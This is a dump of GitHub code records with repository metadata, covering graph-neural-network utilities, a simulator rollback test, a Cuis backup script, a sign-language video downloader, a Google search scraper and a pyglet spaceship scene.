"usage_type": "name"}, {"api_name": "TelegramBot.config.OWNER_USERID", "line_number": 67, "usage_type": "name"}, {"api_name": 
"pyrogram.types.CallbackQuery.answer", "line_number": 68, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 68, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 70, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 70, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 71, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 73, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 74, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 74, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 75, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 77, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 78, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 78, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 79, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 81, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 82, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 82, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 83, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 85, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 86, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 86, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 87, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.answer", "line_number": 88, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 88, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_callback_query", "line_number": 49, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 49, "usage_type": "name"}, {"api_name": "pyrogram.filters.regex", "line_number": 49, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 49, "usage_type": "name"}, {"api_name": "TelegramBot.helpers.decorators.ratelimiter", "line_number": 50, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 92, "usage_type": "name"}, {"api_name": "TelegramBot.bot.me", "line_number": 100, "usage_type": "attribute"}, {"api_name": "TelegramBot.bot", "line_number": 100, "usage_type": "name"}, {"api_name": "TelegramBot.database.database.saveChat", "line_number": 101, "usage_type": "call"}, {"api_name": "TelegramBot.database.database", "line_number": 101, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 91, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 91, "usage_type": "name"}, {"api_name": 
"pyrogram.filters.new_chat_members", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pyrogram.filters", "line_number": 91, "usage_type": "name"}]}
+{"seq_id": "20410787261", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 20 18:12:49 2023\n\n@author: Tommaso Giacometti\n\"\"\"\n\nimport torch\nimport torch_geometric as pyg\nfrom torch import Tensor\nimport numpy as np\nfrom plots import Bcolors\nfrom torch_sparse import spspmm, coalesce\nimport matplotlib.pyplot as plt\n\n\n\nEPS = 1e-15\n\n\ndef get_fnn_input(embedding : Tensor, links : Tensor) -> Tensor:\n '''\n Generate the input for the FNN.\n\n Parameters\n ----------\n embedding : Tensor\n The embedding of the VGAE of dimension NxD, where N is the number of nodes and D the embedding dimension.\n links : Tensor (Sparse)\n Adjacency sparse matrix of the links to transform of dimension 2xL.\n\n Returns\n -------\n Tensor\n Inputs for the FNN of dimension Lx2D.\n\n '''\n col1 = torch.squeeze(embedding[links.T[:,0:1]])\n col2 = torch.squeeze(embedding[links.T[:,1:2]])\n x = torch.hstack((col1,col2))\n return x.requires_grad_(True)\n \n\ndef minibatch(tens : Tensor, batch_size : int = 32, shuffle : bool = True) -> Tensor:\n '''\n Transform the tensor in a iterable tensor divided in batch_size's tensors.\n WRANING : if the number of rows of tens is not a multiple of batch_size, a part of the samples will be wasted.\n\n Parameters\n ----------\n tens : Tensor\n Tensor of dimension *x2D to be dividen in batches.\n batch_size : int, optional\n The default is 32.\n shuffle : bool, optional\n Shuffle the row of the input tensor. The default is True.\n\n Returns\n -------\n tens : Tensor\n tensor of size: batches x batch_size x 2D.\n\n '''\n if shuffle:\n ind = torch.randperm(tens.shape[0])\n tens = tens[ind]\n batches = tens.shape[0]//batch_size\n if tens.shape[0]%batch_size == 0:\n tens = tens.view(batches, batch_size, tens.shape[1])\n else:\n print(f'{Bcolors.WARNING}WARNING : {Bcolors.ENDC} since the number of ', end='')\n print(f'training sample {tens.shape[0]} is not a multiple of {batch_size}, ', end='')\n print(f'{tens.shape[0]%batch_size} random samples will be wasted.')\n tens = tens[:batches*batch_size]\n tens = tens.view(batches, batch_size, tens.shape[1])\n return tens\n\n\ndef get_argmax_VGAE(model, data):\n tp = 0\n fp = 0\n model.eval()\n with torch.no_grad():\n z = model.encode(data.x, data.train_pos)\n pos_out = model.decode(z, data.test_pos)\n pos_out = pos_out.cpu().numpy()\n neg_out = model.decode(z, data.test_neg)\n neg_out = neg_out.cpu().numpy()\n for p in pos_out:\n if p > 0.5:\n tp += 1\n for p in neg_out:\n if p > 0.5:\n fp += 1\n tn = len(neg_out) - fp\n fn = len(pos_out) - tp\n assert tp + fn == len(pos_out)\n assert fp + tn == len(neg_out)\n accuracy = (tp+tn)/(tp+tn+fp+fn)\n sensitivity = tp/(tp+fn)\n specificity = tn/(tn+fp)\n precision = tp/(tp+fp)\n fscore = 2*precision*sensitivity/(precision+sensitivity) \n out = dict(accuracy=accuracy, sensitivity=sensitivity, specificity=specificity, precision=precision,fscore=fscore) \n return out\n\n\ndef get_argmax_FNN(model, data):\n model.eval()\n with torch.no_grad():\n h_pos = torch.nn.functional.softmax(model(data.test_emb_pos), dim = 1)\n h_neg = torch.nn.functional.softmax(model(data.test_emb_neg), dim = 1)\n h_pos = torch.argmax(h_pos, dim = 1)\n h_neg = torch.argmax(h_neg, dim = 1)\n h_pos = h_pos.detach().cpu().numpy()\n h_neg = h_neg.detach().cpu().numpy()\n tp = np.sum(h_pos)\n fp = np.sum(h_neg)\n tn = len(h_neg) - fp\n fn = len(h_pos) - tp\n assert tp + fn == len(h_pos)\n assert fp + tn == len(h_neg)\n accuracy = (tp+tn)/(tp+tn+fp+fn)\n sensitivity = tp/(tp+fn)\n specificity = tn/(tn+fp)\n 
precision = tp/(tp+fp)\n fscore = 2*precision*sensitivity/(precision+sensitivity)\n out = dict(accuracy=accuracy, sensitivity=sensitivity, specificity=specificity, precision=precision,fscore=fscore) \n return out\n \n \ndef column_norm(data : Tensor) -> Tensor:\n features = torch.tensor([data.shape[1]])\n mean = torch.mean(data, 0)\n var = torch.var(data, dim=0)\n std = torch.sqrt(var)\n normal = (data - mean)/(std+EPS)\n return normal/torch.sqrt(features)\n\n\ndef print_dict(dictionary : dict, part = None) -> None:\n print()\n if part is not None:\n print(part)\n for e in dictionary:\n print(f'{e}: {dictionary[e]:.5f}')\n pass\n\n\ndef adj_with_neighbors(adj : Tensor, mat_dim : int, order : int, plot : bool = True):\n values = torch.ones_like(adj[0],requires_grad=False).float()\n adj.requires_grad_(False)\n \n n_pow, val_pow = adj, values\n n_neig = [n_pow.shape[1]]\n i=0\n \n tot_adj = adj.clone()\n tot_val = values.clone()\n \n for i in range(order-1):\n n_pow, val_pow = spspmm(n_pow, val_pow, adj, values, mat_dim, mat_dim, mat_dim)\n n_neig.append(n_pow.shape[1])\n n_pow, val_pow = pyg.utils.remove_self_loops(n_pow,val_pow)\n \n # transform_val = (val_pow+1).clone().log10() # old implementation\n # transform_val = torch.pow(0.8*transform_val/torch.max(transform_val), i+2)\n mean = val_pow.mean()\n std = val_pow.std()\n transform_val = (val_pow.clone()-mean)/std\n transform_val = torch.sigmoid(transform_val)\n transform_val = torch.pow(transform_val, i+1)\n # transform_val = transform_val/(i+1)\n\n tot_adj = torch.hstack((tot_adj,n_pow))\n tot_val = torch.hstack((tot_val,transform_val))\n if len(val_pow) == 0:\n break \n \n if plot:\n exp = list(range(i+2))\n exp = [i+1 for i in exp]\n fig, ax = plt.subplots()\n ax.bar(exp, n_neig)\n ax.set_title('Total number of link for order of the adj matrix')\n ax.set_xlabel('adj matrix order')\n ax.set_ylabel('Number of links')\n plt.show()\n \n tot_adj, tot_val = coalesce(tot_adj, tot_val, mat_dim, mat_dim)\n \n\n return tot_adj, tot_val\n\ndef reconstruct_graph(data, data_fnn, model):\n model.eval()\n with torch.no_grad():\n out_pos = model(data_fnn.test_emb_pos)\n out_neg = model(data_fnn.test_emb_neg)\n links = data.train_pos.clone()\n \n for i, out in enumerate(out_pos):\n if torch.argmax(out) == 1:\n links = torch.hstack((links,data.test_pos[:,i:i+1]))\n for i, out in enumerate(out_neg):\n if torch.argmax(out) == 1:\n links = torch.hstack((links,data.test_neg[:,i:i+1])) \n return links\n \n \n \n \n \n \n \n \n \n ", "repo_name": "TommyGiak/VGAE_FNN", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 6678, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.Tensor", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.squeeze", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.randperm", "line_number": 65, "usage_type": "call"}, {"api_name": "plots.Bcolors.WARNING", "line_number": 71, "usage_type": "attribute"}, {"api_name": "plots.Bcolors", "line_number": 71, "usage_type": "name"}, {"api_name": "plots.Bcolors.ENDC", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 110, 
"usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.softmax", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 112, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.var", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 151, "usage_type": "call"}, {"api_name": "torch_sparse.spspmm", "line_number": 162, "usage_type": "call"}, {"api_name": "torch_geometric.utils.remove_self_loops", "line_number": 164, "usage_type": "call"}, {"api_name": "torch_geometric.utils", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.sigmoid", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "torch_sparse.coalesce", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 207, "usage_type": "call"}]}
+{"seq_id": "42445548348", "text": "import json\n\n\ndef test_read_main(simulator_configuration, record_file_name, client):\n response = client.post(\n \"/workspaces/\",\n json=simulator_configuration,\n )\n assert response.status_code == 200\n simulator_id = response.json()[\"id\"]\n\n with open(record_file_name, encoding=\"utf-8\") as f:\n actions = [line.split(\"\\t\")[1] for line in f]\n\n for idx in range(25):\n resp = client.post(\n f\"/workspaces/play/{simulator_id}\",\n json=json.loads(actions[idx]),\n )\n\n saved_resp = resp\n\n for idx in range(25, 50):\n resp = client.post(\n f\"/workspaces/play/{simulator_id}\",\n json=json.loads(actions[idx]),\n )\n\n rollback_resp = client.post(\n f\"/workspaces/rollback/{simulator_id}/24\",\n )\n\n assert rollback_resp.status_code == 200\n\n new_resp = client.post(\n f\"/workspaces/play/{simulator_id}\",\n json=json.loads(actions[24]),\n )\n\n assert saved_resp.json() == new_resp.json()\n", "repo_name": "simaple-team/simaple", "sub_path": "test_app/test_rollback.py", "file_name": "test_rollback.py", "file_ext": "py", "file_size_in_byte": 1013, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 29, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "35652744296", "text": "import subprocess\nimport time\nimport os\nimport datetime\n\ndef take_input():\n CUIS_PATH = raw_input(\"Enter cuis directory (default: .): \") or \"./\"\n SAVING_INTERVAL_IN_SECONDS = int(raw_input(\"Enter interval in seconds to backup (default: 60): \") or 60)\n OUTPUT_DIR_BASE_PATH = raw_input(\"Enter output directory (default: /tmp): \") or \"/tmp\"\n return CUIS_PATH, SAVING_INTERVAL_IN_SECONDS, OUTPUT_DIR_BASE_PATH\n\ndef generate_zip(cuis_path, output_dir, file_name):\n cmd = \"ls -- {}/CuisUniversity* | zip \\\"{}/{}\\\" -@ > /dev/null\".format(cuis_path, output_dir, file_name)\n subprocess.call(cmd, shell=True)\n\ndef create_folder_if_does_not_exist(directory, folder_name):\n absolute_path_to_output = directory + \"/\" + folder_name\n if os.path.isdir(absolute_path_to_output):\n print(\"Folder exists. (path: {})\".format(absolute_path_to_output))\n else:\n print(\"Creating folder at path: {}\".format(absolute_path_to_output))\n os.mkdir(absolute_path_to_output)\n\ndef log_args():\n print(\"----------ARGS----------\")\n print(\"CUIS_PATH: {}\".format(CUIS_PATH))\n print(\"OUTPUT_DIR_PATH: {}\".format(OUTPUT_DIR_BASE_PATH))\n print(\"SAVING_INTERVAL: {} secs.\".format(SAVING_INTERVAL_IN_SECONDS))\n print(\"------------------------\")\n\n\nCUIS_PATH, SAVING_INTERVAL_IN_SECONDS, OUTPUT_DIR_BASE_PATH = take_input()\nlog_args()\n\nOUTPUT_FOLDER_NAME = \"backup-cuis-\" + datetime.datetime.now().strftime('%Y-%m-%d')\ncreate_folder_if_does_not_exist(OUTPUT_DIR_BASE_PATH, OUTPUT_FOLDER_NAME)\nOUTPUT_DIR_PATH = OUTPUT_DIR_BASE_PATH + \"/\" + OUTPUT_FOLDER_NAME\n\nbackup_count = 0\nwhile True:\n\n file_name = datetime.datetime.now().strftime('%Y-%m-%d_%H.%M.%S')\n time_now = datetime.datetime.now().strftime('%H:%M:%S')\n generate_zip(CUIS_PATH, OUTPUT_DIR_PATH, file_name)\n print(\"[{}] Generated backup #{} with name {}\".format(time_now, backup_count, file_name))\n \n backup_count += 1\n time.sleep(SAVING_INTERVAL_IN_SECONDS)\n\n", "repo_name": "scherman/cuis-backupper", "sub_path": "cuis-backupper.py", "file_name": "cuis-backupper.py", "file_ext": "py", "file_size_in_byte": 1959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "subprocess.call", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "16161528664", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nplf = pd.read_csv(\"plf_lexica.csv\")\n\n\n# In[3]:\n\n\nvideos = pd.read_csv(\"videos.csv\")\n\n\n# In[4]:\n\n\nimport json\nvideos_json = {}\nwords = list(plf.iloc[:,0])\n\nfor row in videos.iterrows():\n word = str(row[1][0]).lower()\n \n if word not in words:\n continue\n \n print(row)\n \n if word not in videos_json.keys():\n videos_json[word] = { \n \"urls\" : [], \n \"plfs\" : list(plf.loc[plf[\"Entry ID\"] == word].to_numpy()[0,1:]) }\n \n videos_json[word][\"urls\"].append(row[1][2])\n\n\n# In[ ]:\n\n\nvideos_json[\"hello\"]\n\n\n# In[ ]:\n\n\njson.dump(videos_json,open(\"videos.json\",\"w+\"),indent=True)\n\n\n# In[6]:\n\n\nimport json\nvideos_json = json.load(open(\"videos.json\"))\n\n\n# In[10]:\n\n\nimport os\nnum_vids = 0\nfor word in videos_json.keys():\n if num_vids > 100:\n break\n \n url = videos_json[word][\"urls\"][0]\n \n print(word, url)\n if \"youtube\" in url:\n os.system(f'youtube-dl {url} -o ./videos/{word}.mp4')\n else:\n os.system(f'wget {url} -O ./videos/{word}.mp4')\n\n num_vids += 1\n \n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "leekezar/acorns", "sub_path": "islr data/acorns/scrape SignASL/download_videos.py", "file_name": "download_videos.py", "file_ext": "py", "file_size_in_byte": 1151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "json.load", "line_number": 56, "usage_type": "call"}, {"api_name": "os.system", "line_number": 72, "usage_type": "call"}, {"api_name": "os.system", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "32134259264", "text": "# Author: Ana Sanmartin\n#\n# This file obtains from command line the list of words inserted by the user\n\n#Dependencies are\n#pip install beautifulsoup4\n#pip install google\n\n# IMPORTS \n\nimport argparse\nimport os\nfrom downloader import download_text\nfrom check_resource import check_resource_retrieved_before\n#import numpy as np\n\ntry: \n from googlesearch import search \nexcept ImportError: \n print(\"No module named 'google' found\") \n\n\n## CAN BE ESTABLISHED BY THE USER ##\nn = 10;\nurl = ''\nsearcher = 'www.google.com'\nout_path = os.getcwd()\nword = ''\n\ndef google_search(word, url, n, searcher, out_path):\n\n \"\"\"\n query : query string that we want to search for.\n tld : tld stands for top level domain which means we want to search our result on google.com or google.in or some other domain.\n lang : lang stands for language.\n num : Number of results we want.\n start : First result to retrieve.\n stop : Last result to retrieve. Use None to keep searching forever.\n pause : Lapse to wait between HTTP requests. Lapse too short may cause Google to block your IP. Keeping significant lapse will make your program slow but its safe and better option.\n Return : Generator (iterator) that yields found URLs. If the stop parameter is None the iterator will loop forever. \n \"\"\"\n list_searches = []\n \n\n #We have two different functionalities: The user enters a word for searching or a specific url\n if len(url) != 0:\n # User has entered a specific URL\n print(check_resource_retrieved_before(url, out_path))\n if (check_resource_retrieved_before(url, out_path)):\n print(\"This URL already was searched before. Thus, we will not search again for the text\")\n \n else:\n urls2doc(url, word.replace(\"_\", \" \"), out_path)\n download_text(out_path)\n\n else: \n query = word.replace(\"_\", \" \")\n \n print(query)\n print(out_path)\n \n list_searches = search_only(query, n, out_path)\n if len(list_searches) != 0:\n for url in list_searches:\n urls2doc(url, query, out_path)\n download_text(out_path)\n else:\n print(\"Nothing was retrieved\")\n\n\ndef search_only(query, n, out_path):\n list_searches = []\n counter = 0\n \n for i in search(query, tld=\"es\", num=n, start=0, stop=None, pause=2):\n if (check_resource_retrieved_before(i, out_path)):\n print(\"we have encountered a match\")\n else:\n list_searches.append(i)\n counter = counter + 1\n #print(counter)\n if (counter == n):\n break\n return list_searches\n \n \n\n \ndef urls2doc(url, word, dir_path):\n\n dir_path += \"/url_list.txt\"\n \n doc = open(dir_path, \"a\")\n #print(doc.read())\n\n doc.write(url + \" \" + word + \"\\n\")\n doc.close()\n \n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Search by terms\")\n\n parser.add_argument('-w',\n \"--word\",\n type=str,\n help=\"Word to search\")\n \n parser.add_argument('-u',\n \"--url\",\n type=str,\n help=\"Specific url to search\") \n \n parser.add_argument('-n',\n \"--n\",\n type=int,\n help=\"Number of pages to store\")\n\n parser.add_argument('-s',\n \"--search\",\n type=str,\n help=\"Search engine to use.\")\n\n parser.add_argument('-o',\n \"--output\",\n type=str,\n help=\"Output path where files are going to be stored\")\n\n # Parseo de los argumentos\n arguments = vars(parser.parse_args())\n\n if arguments['word']:\n if isinstance(arguments['word'], str):\n word = arguments['word']\n else:\n print(\"ERROR: Please enter valid words\")\n exit()\n \n if arguments['url']:\n if 
isinstance(arguments['url'], str):\n url = arguments['url']\n else:\n print(\"ERROR: Please enter a valid search engine.\")\n exit()\n \n if arguments['n']:\n if isinstance(arguments['n'], int):\n if arguments['n'] > 0:\n n = arguments['n']\n else:\n print(\"ERROR: N must be bigger than 0\")\n exit()\n \n if arguments['search']:\n if isinstance(arguments['search'], str):\n searcher = arguments['search']\n else:\n print(\"ERROR: Please enter a valid search engine.\")\n exit()\n \n if arguments['output']:\n if isinstance(arguments['output'], str):\n if(os.path.isdir()):\n output_type = arguments['output']\n else:\n print(\"ERROR: Please enter a valid path.\")\n exit()\n else:\n print(\"ERROR: Please enter a valid path.\")\n exit()\n\n google_search(word, url, n, searcher, out_path)\n\n", "repo_name": "cossorzano/copenmed_tools", "sub_path": "webscraping/searcher.py", "file_name": "searcher.py", "file_ext": "py", "file_size_in_byte": 5174, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.getcwd", "line_number": 27, "usage_type": "call"}, {"api_name": "check_resource.check_resource_retrieved_before", "line_number": 48, "usage_type": "call"}, {"api_name": "check_resource.check_resource_retrieved_before", "line_number": 49, "usage_type": "call"}, {"api_name": "downloader.download_text", "line_number": 54, "usage_type": "call"}, {"api_name": "downloader.download_text", "line_number": 66, "usage_type": "call"}, {"api_name": "googlesearch.search", "line_number": 75, "usage_type": "call"}, {"api_name": "check_resource.check_resource_retrieved_before", "line_number": 76, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}]}
+{"seq_id": "38309837337", "text": "import pyglet\r\nimport random\r\nfrom OpenGL.GL import *\r\n\r\nfrom math import *\r\nfrom collections import deque\r\nfrom itertools import chain\r\nfrom pathlib import Path\r\nimport numpy as np\r\nimport sys\r\nimport os.path\r\nsys.path.append(os.path.dirname(os.path.dirname(os.path.dirname((os.path.abspath(__file__))))))\r\n\r\nimport libs.transformations as tr\r\nimport libs.basic_shapes as bs\r\nimport libs.scene_graph as sg\r\nimport libs.easy_shaders as es\r\nimport libs.lighting_shaders as ls\r\nimport libs.curves as cs\r\n\r\nfrom libs.gpu_shape import createGPUShape\r\nfrom libs.obj_handler import read_OBJ2\r\nfrom libs.assets_path import getAssetPath\r\nfrom utils import createOFFShape\r\nfrom ship import createShip, createsombra\r\nfrom pyglet.graphics.shader import Shader, ShaderProgram\r\nfrom pathlib import Path\r\nfrom itertools import chain\r\n\r\nclass Controller(pyglet.window.Window):\r\n\r\n def __init__(self, width, height, tittle=f\"Tarea 3 - Adolfo Arenas P\"):\r\n super().__init__(width, height, tittle)\r\n self.pipeline = es.SimpleTextureModelViewProjectionShaderProgram()\r\n self.pipeline2 = es.SimpleModelViewProjectionShaderProgram()\r\n self.check_points = []\r\n self.check_points_tograph = []\r\n self.step = 0\r\n self.curve = []\r\n self.show_route = False\r\n self.path= []\r\n\r\nwidth = 1280\r\nheight = 960\r\nN = 100\r\ncontroller = Controller(width, height)\r\nPERSPECTIVE_PROJECTION = 1\r\nORTOGRAPHIC_PROJECTION = 0\r\n\r\nPROJECTIONS = [tr.ortho(-8, 8, -8, 8, 0.0001, 1000),\r\n tr.perspective(80, float(width)/float(height), 0.0001, 100)]\r\n\r\nwith open(Path(os.path.dirname(__file__)) / \"point_vertex_program.glsl\") as f:\r\n vertex_program = f.read()\r\n\r\nwith open(Path(os.path.dirname(__file__)) / \"point_fragment_program.glsl\") as f:\r\n fragment_program = f.read()\r\n\r\nvert_shader = Shader(vertex_program, \"vertex\")\r\nfrag_shader = Shader(fragment_program, \"fragment\")\r\npipeline = ShaderProgram(vert_shader, frag_shader)\r\n\r\n\r\nclass Ship():\r\n\r\n def __init__(self):\r\n self.shape = createShip(controller.pipeline)\r\n self.shapesombra = createsombra(controller.pipeline)\r\n self.x = 0\r\n self.y = 5\r\n self.z = 0\r\n self.velocity = 0\r\n self.rotationylocal = 0\r\n self.altitude = 0\r\n self.route = []\r\n self.start_route = False\r\n self.linex = 0\r\n self.liney = 0\r\n self.linez = 0\r\n\r\nship = Ship()\r\n\r\nclass Camera:\r\n\r\n def __init__(self, at=np.array([ship.x, ship.y, ship.z],dtype=float), \r\n eye=np.array([5 , 7, 5],dtype=float), \r\n up=np.array([0, 1, 0],dtype=float)) -> None:\r\n \r\n #Parametros de la camara\r\n self.at = at\r\n self.eye = eye\r\n self.up = up\r\n\r\n self.available_projections = PROJECTIONS\r\n self.projection = self.available_projections[ORTOGRAPHIC_PROJECTION]\r\n\r\n def set_projection(self, projection_name):\r\n self.projection = self.available_projections[projection_name]\r\n #siga a nuestra nave y no se rote\r\n\r\ncamera = Camera()\r\n\r\nclass Point():\r\n \r\n def __init__(self, position):\r\n self.ex_shape = createGPUShape(controller.pipeline2,bs.createColorCube(1.0, 0.5, 0.0))\r\n self.position = np.array(position, dtype=np.float32)\r\n\r\n#Aqui agregamos hijos de la clase Ship que creamos para formar nuestro escuadron\r\ndef crearEscuadron():\r\n\r\n shipNode1 = sg.SceneGraphNode('ship')\r\n shipNode1.transform = tr.matmul([tr.rotationY(np.deg2rad(180)), tr.uniformScale(0.8)])\r\n shipNode1.childs += [ship.shape]\r\n\r\n shipNode2 = 
sg.SceneGraphNode('ship2')\r\n shipNode2.transform = tr.translate(2,0,3)\r\n shipNode2.childs += [shipNode1]\r\n\r\n shipNode3 = sg.SceneGraphNode('ship3')\r\n shipNode3.transform = tr.translate(-2,0,3)\r\n shipNode3.childs += [shipNode1]\r\n\r\n Escuadron = sg.SceneGraphNode('Escuadron')\r\n Escuadron.transform = tr.translate(0,0.1,0)\r\n Escuadron.childs += [shipNode1]\r\n Escuadron.childs += [shipNode2]\r\n Escuadron.childs += [shipNode3]\r\n\r\n return Escuadron\r\n#Separe sombras de la nave para que las sombras no subieran tambien, ya que daba un efecto raro. Ahora las sombras siempre estan a la altura del piso.\r\ndef crearSombra():\r\n sombra = sg.SceneGraphNode('sombra')\r\n sombra.transform = tr.matmul([tr.translate(0,0.1,0), tr.scale(0.6,0.01,0.6), tr.rotationY(np.deg2rad(180))])\r\n sombra.childs += [ship.shapesombra]\r\n\r\n sombra1 = sg.SceneGraphNode('sombra1')\r\n sombra1.transform = tr.translate(ship.x, 0, ship.z)\r\n sombra1.childs += [sombra]\r\n\r\n sombra2 = sg.SceneGraphNode('sombra2')\r\n sombra2.transform = tr.translate(ship.x+2, 0, ship.z+3)\r\n sombra2.childs += [sombra]\r\n\r\n sombra3 = sg.SceneGraphNode('sombra3')\r\n sombra3.transform = tr.translate(ship.x-2, 0, ship.z+3)\r\n sombra3.childs += [sombra]\r\n\r\n Sombras = sg.SceneGraphNode('Sombras')\r\n Sombras.transform = tr.translate(0,0,0)\r\n Sombras.childs += [sombra1]\r\n Sombras.childs += [sombra2]\r\n Sombras.childs += [sombra3]\r\n\r\n return Sombras\r\n\r\n#Con ayuda del auxiliar 3 ponemos un piso a la escena\r\ndef createFloor() -> sg.SceneGraphNode:\r\n\r\n Floor = 